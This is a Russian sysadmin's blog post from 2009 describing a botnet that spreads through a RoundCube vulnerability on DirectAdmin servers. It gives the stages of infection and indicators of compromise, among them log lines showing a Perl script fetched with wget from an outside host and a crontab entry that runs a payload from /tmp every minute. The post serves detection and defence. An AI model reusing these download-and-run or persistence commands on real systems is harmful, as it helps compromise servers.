Записки сисадмина

Или помойное ведро идей


Выделенные сервера от $130
VDS/VPS от $20

Обнаружено формирование крупного ботнета

С середины декабря 2008 (минимум) формируется неизвестный массивный ботнет. Назовем его «Кубик«. Троянятся не клиентские машины, а сервера на могучих каналах.

«Кубик» потому что в качестве основы проникновения используется некая уязвимость в RoundCube. Который, в свою очередь в открытом виде поставляется на сервера с панелью DirectAdmin.

Все проникновения однотипны. Эксплуатируя уязвимость, атакующий бот загружает на сервер перловый или бинарный скрипт в /tmp или /var/tmp. Оттуда скрипт выполняется (если нет опции монтирования noexec) и докачивает целый букет хакрских утилит.

В первую очередь, устанавливается и выполняется IRC-бот. Именно по этому я решил что формируется ботнет. Далее, если повезет с уязвимостью ядра 2.6.18-53 (или другим способом повышения привилегий), взломщик получает рута и устанавливает RootKit.Linux.Agent.v или подобную заразу.

Видоизмененный баш вешается на случайны порт конечно же в любом успешном раскладе.

Для эксплуатации системы использутся эксплойты: Foda,Brk,Race,Local.

На систему так же устанавливается ПО, которое автоматически сканирует другие компьютеры на предмет уязвимости RoundCube.

Поскольку DirectAdmin ставит RoundCube на виртуальные и дефолтные хосты под стандартным названием, ничем не прикрытым, то такие сканы часто заканчиваются успехом.

Признаки взлома.

В общем error_log начиная с середины декабря есть подобные сообщения:

=============================

botn7bsd.txt                                  botn7bsd.txt
28 kB   48 kBps
28 kB   45 kBps
wget: not found
chmod: bnc.txt: No such file or directory
==============================

/html/404.shtml, referer: http://1gav.com/681-seks-s-molodenkojj-pukhloj
–18:40:55–  http://www.igotsluts.com/test/dc.pl
Resolving www.igotsluts.com… 67.55.104.228
Connecting to www.igotsluts.com|67.55.104.228|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 761 [text/plain]
Saving to: `dc.pl’

0K                                                       100% 90.7M=0s

18:40:56 (90.7 MB/s) – `dc.pl’ saved [761/761]

Проще говоря, что-то скачали, что то запустили.

Это «Что-то» как правило лежит в «/tmp/…/«, «/tmp/.t/» и вообще где то в /tmp, /var/tmp и других каталогах /var с правами на запись всем.

В кронтабе появляется крон от юзера Apache

* * * * * /tmp/…/update >/dev/null 2>&1

Или что то вроде того. На одной из зараженных машин, вредоносные скрипты генерировали исходящий трафик под 100 Мбит/сек. На других не проявляли активности, кроме хождения по IRC-серверам.

Дополнительные ссылки:

http://www.master-x.com/forum/topics/116055/

http://www.opennet.ru/openforum/vsluhforumID10/4136.html

13.02.2009 Автор admin | Безопасность, Происшествия | no comments

« Раньше | Позже »

Комментариев нет »

Комментариев пока нет.

Оставить комментарий